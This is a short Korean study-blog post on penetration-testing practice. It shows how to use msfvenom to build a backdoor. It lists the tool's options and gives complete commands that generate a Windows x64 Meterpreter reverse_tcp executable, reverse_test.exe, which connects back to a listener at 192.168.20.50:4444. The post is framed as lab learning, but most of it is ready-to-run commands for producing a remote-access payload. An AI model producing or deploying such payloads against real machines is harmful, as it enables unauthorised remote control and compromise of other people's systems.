Study Record

[모의해킹 실습] msfvenom CMD 로 백도어 만들기 - 악성코드 본문

모의해킹

[모의해킹 실습] msfvenom CMD 로 백도어 만들기 - 악성코드

초코초코초코 2021. 11. 15. 03:02
728x90

msfvenom CMD

- Metasploit 의 payload 를 이용하여 백도어를 만들어준다.

옵션 설명
-p [payload 경로]  payload가 있는 경로를 설정한다.
-l, --list List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, format ...
-f, --format <format> Output format (use --help-formats for a list)
-o, --out <path> Save the payload

# msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options 

: windows/x64/meterpreter/reverse_tcp 에 대해 자세한 설명을 보여준다.

 

# msfvenom -p windows/x64/meterpreter/reverse_tcp \

LHOST=192.168.20.50 LPORT=4444 -f exe  > reverse_test.exe

# msfvenom -p windows/x64/meterpreter/reverse_tcp \

LHOST=192.168.20.50 LPORT=4444 \

-f exe \

-o reverse_test.exe

: reverse_test.exe 파일로 windows/x64/meterpreter/reverse_tcp 라는 payload 를 이용하여 백도어를 만들어준다.

 

* PE : MS Windows 환경에서 실행 파일 포맷(# file reverse_test.exe)

* ELF: Linux/Unix 환경에서 실행 파일 포맷(# file /usr/bin/ls)

728x90